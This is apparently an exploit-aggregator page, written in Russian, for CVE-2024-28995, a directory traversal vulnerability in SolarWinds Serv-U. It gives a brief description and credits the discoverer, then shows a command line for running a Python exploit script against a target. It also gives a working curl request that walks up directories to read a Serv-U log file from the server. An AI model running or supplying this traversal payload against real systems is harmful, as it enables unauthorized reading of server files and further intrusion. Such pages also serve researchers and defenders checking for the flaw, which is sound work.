Sploitus

Exploit for CVE-2024-28995

kitploit · 2026-08-26

Exploit Code

MARKDOWN25 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-0XC4T-CVE-2024-28995
## Эксплойт для CVE-2024-28995

5 июня 2024 года компания SolarWinds опубликовала уведомление об уязвимости CVE-2024-28995 — высокоопасной уязвимости обхода каталогов, затрагивающей их решение для передачи файлов Serv-U. Уязвимость была обнаружена исследователем Хусейном Дахером из Web Immunify.

### Использование эксплойта

root@kitploit:~
    
    
    python3 CVE-2024-28995.py -t http://example.com/ -f somefile
    

### Использование Curl

root@kitploit:~
    
    
    curl -i -k --path-as-is "http://<target>/?InternalDir=/../../../../ProgramData/RhinoSoft/Serv-U/&InternalFile=Serv-U-StartupLog.txt"
    

Ссылки:

  * https://attackerkb.com/topics/2k7UrkHyl3/cve-2024-28995/rapid7-analysis
  * https://nvd.nist.gov/vuln/detail/CVE-2024-28995